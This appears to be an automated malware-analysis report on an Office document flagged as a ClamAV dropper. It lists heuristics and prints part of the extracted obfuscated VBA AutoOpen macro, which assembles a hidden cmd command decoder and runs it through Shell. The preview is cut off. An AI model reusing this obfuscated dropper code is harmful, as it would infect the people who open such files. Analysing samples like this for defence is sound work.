Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro uses the Shell function with obfuscated string concatenation to construct and execute a command. The specific command constructed is too obfuscated to fully determine, but the pattern suggests it is intended to download and execute a secondary payload.
Heuristics (5)
- ClamAV: Doc.Dropper.Valyria-6667198-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Valyria-6667198-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12918 bytes |

SHA-256: 31bd437632e300f3159c40e6dcf4b41958c383ede1fc21364dc000e9893c8ccb
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "MlTiwrSuYj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName 431593219
TypeName 3371
TypeName Log(LjUKHK * IowScc)
TypeName CDate(ROlJA)
TypeName 180632239
TypeName HQraiT
Shell@ KeyString(vbKeyC) + vIzGYhQsjPOMu + GScqjBiicz + wBWcHoTV + dizMwSmi + iwnMY + BJCnAAc + jsNiwSL + ZJFiXIB + uOqANTjRNW + IbCWfu + DIkun + NUfXzQFQD + wcNidMJAtfpNd + dVuaUiEL, 903832498 - 903832498
TypeName 65
TypeName Tan(679)
End Sub
Attribute VB_Name = "bBMPYHmfVjhsE"
Function wBWcHoTV()
On Error Resume Next
TypeName Tan(4)
TypeName Sgn(mbYKdz)
TypeName 334838176
zqqAbSkTIz = "m" + "d" + " /V" + "/C" + CStr(Chr(zvrUiGHkjjQ + zQjZiGtoJjzuT + 34 + zwizXnJAa + bTJvhRYoJ)) + "se" + "t" + " , " + " " + " =" + "IA" + "J" + "YAU"
TypeName Round(922)
TypeName 948
TypeName CStr(90754 / HkVHb)
bUwrWrPpiEH = "oD" + "f" + "rM" + "n" + "Y" + "i" + "AN" + "Ww" + "nXT" + "d"
TypeName 3931
TypeName khblR
TypeName ChrB(wVaWfS)
XOMSmk = "k" + "To" + "wMv" + "A" + "jww" + "p" + "CR" + "E/;" + ":b" + "," + "scS" + "Z" + "a"
TypeName Tan(YjRpo)
TypeName 6948
TypeName Sqr(FzzGt)
PaFsb = "t" + "} " + "5" + "=" + "y." + "(2)" + "Gh" + "\x"
TypeName OEzmtj
TypeName CBool(6189)
VkjfT = "l" + "-'@" + "{m" + "e+3" + "qQ" + "u" + "0" + "P" + "$g" + "F"
wBWcHoTV = zqqAbSkTIz + bUwrWrPpiEH + XOMSmk + PaFsb + VkjfT
TypeName CStr(79)
TypeName Oct(YiotX - Ykalu)
TypeName 12
End Function
Function dizMwSmi()
On Error Resume Next
TypeName Cos(LzimEd)
TypeName Atn(EmwUJs)
TypeName 99
FvftBc = "&" + "&fo" + "r %" + "j i" + "n " + "(32" + ";" + "2" + "4;" + "31;"
TypeName CInt(qVfXLG)
TypeName 23
TypeName 9
RQznKODmO = "66" + ";9;" + "4" + "1;5" + "7;" + "6" + "6;" + "60" + ";60" + ";" + "4"
TypeName 393354982
TypeName CInt(37674 / 23023)
TypeName 2
qijmY = "8;7" + "4" + ";44" + ";76" + ";1" + "6;" + "5"
TypeName CLng(982)
TypeName Round(jYnUPb - kGZfPs)
hYcmOaU = "0;" + "1" + "8;" + "66;" + "31;" + "61;" + "24;" + "39"
TypeName CaDnmb
TypeName Rnd(8082)
ErCqMSzYo = ";" + "2" + "9" + ";" + "66;" + "4" + "2" + ";46"
dizMwSmi = FvftBc + RQznKODmO + qijmY + hYcmOaU + ErCqMSzYo
TypeName zEkauQ
TypeName hiLVF
End Function
Function iwnMY()
On Error Resume Next
TypeName Sin(zINDCq / 29363 + JcAuz / UcKPd)
TypeName Log(5964)
HdHRBzsnNYj = ";48" + ";" + "15;" + "66" + ";4" + "6;" + "52"
TypeName Poibwk
TypeName CStr(453225053)
fMqBAW = ";1" + "6" + ";6" + "6" + ";3" + "9;" + "3" + "3;6" + "0;1" + "3;" + "6" + "6;1"
TypeName LcvzGz
TypeName ChrB(NRRPhM)
jShkkPOFMIZ = "8;" + "46" + ";37" + ";" + "7" + "4;2" + "3;7" + "1;3"
TypeName Rnd(67910 / 21655 / 79903 * JaUdwP)
TypeName Oct(2)
TypeName SmcHB
aArTimzEKAm = "2;" + "50" + ";6" + "2" + ";57" + ";4" + "6;" + "46;"
TypeName ChrB(iESWp)
TypeName ChrB(27818 / zHWBi + 2502 - fYplI)
HNqdUdbzU = "32;" + "38;" + "36;" + "36;" + "41;" + "32"
TypeName CLng(9122)
TypeName 382
TypeName Rnd(rWaoJO / buoEGW + UmFPw - 16236)
zTXlIpZQ = ";66" + ";4" + "2;" + "46;" + "9;" + "7" + "1"
iwnMY = HdHRBzsnNYj + fMqBAW + jShkkPOFMIZ + aArTimzEKAm + HNqdUdbzU + zTXlIpZQ
TypeName 8050
TypeName CDate(bdEzX)
End Function
Function BJCnAAc()
On Error Resume Next
TypeName pfSNZ
TypeName CByte(UuGtwO)
PfzwRwAc = ";6" + "5" + ";3" + "9;2" + "4" + ";24" + ";" + "2" + "2" + ";41"
TypeName CLng(wCCAi / cnohil * bWhZth + CZfLO)
TypeName Int(517929031)
cLFmjhZsz = ";6" + "0;" + "13" + ";" + "65;" + "13" + ";" + "4"
TypeName CInt(psSIjA / EffJD)
TypeName 1
GEnqTcz = "6;6" + "6;2" + "1" + ";" + "5" + "2;4" + "2" + ";24" + ";65" + ";3" + "6"
TypeName Sin(zmTjM)
TypeName Log(bwTYW - 82982 - 73409 - dUzzoP)
TypeName Log(97852 - BduOYV / 44399 * 2369)
jJTVYTL = ";9;" + "1" + "6;" + "6
```

... (truncated)